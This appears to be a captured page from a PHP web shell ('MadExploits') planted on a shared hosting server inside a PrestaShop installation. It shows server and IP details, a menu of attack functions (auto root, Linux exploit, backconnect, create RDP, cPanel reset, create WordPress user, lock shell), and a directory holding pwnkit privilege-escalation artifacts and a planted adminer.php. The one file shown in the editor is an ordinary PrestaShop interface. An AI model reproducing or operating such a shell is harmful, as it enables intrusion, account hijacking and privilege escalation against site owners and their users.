Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
src /
Core /
Search /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Builder
[ DIR ]
drwx---r-x
Filters
[ DIR ]
drwx---r-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ControllerAction.php
2.34
KB
-rw----r--
Filters.php
3.19
KB
-rw----r--
SearchParameters.php
2.75
KB
-rw----r--
SearchParametersInterface.php
1.58
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SearchParametersInterface.php
<?php /** * Created by PhpStorm. * User: dev * Date: 04/07/18 * Time: 12:24. */ namespace PrestaShop\PrestaShop\Core\Search; use Symfony\Component\HttpFoundation\Request; /** * Contract that define how we can retrieve Grid filters from an User request or Repository. * IMPORTANT NOTE: these methods should ONLY return the filters of their respective scope (no * default replacement) otherwise you can't know where the values exactly come from which make * it impossible to fine tune overrides (which one has the priority). * * @see SearchParametersResolver class for usage. * @deprecated Use FiltersBuilderInterface instead */ interface SearchParametersInterface { const FILTER_TYPES = [ 'limit', 'offset', 'orderBy', 'sortOrder', 'filters', ]; /** * Retrieve list of filters from User Request (ONLY those present in * the request). * * @param Request $request * @param string $filterClass the filter class * * @return Filters A collection of filters */ public function getFiltersFromRequest(Request $request, $filterClass); /** * Retrieve list of filters from User searches (ONLY those saved in repository). * * @param int $employeeId * @param int $shopId * @param string $filterClass the filter class * @param string $controller the controller name * @param string $action the action name * * @return Filters|null A collection of filters */ public function getFiltersFromRepository($employeeId, $shopId, $controller, $action, $filterClass); }
Close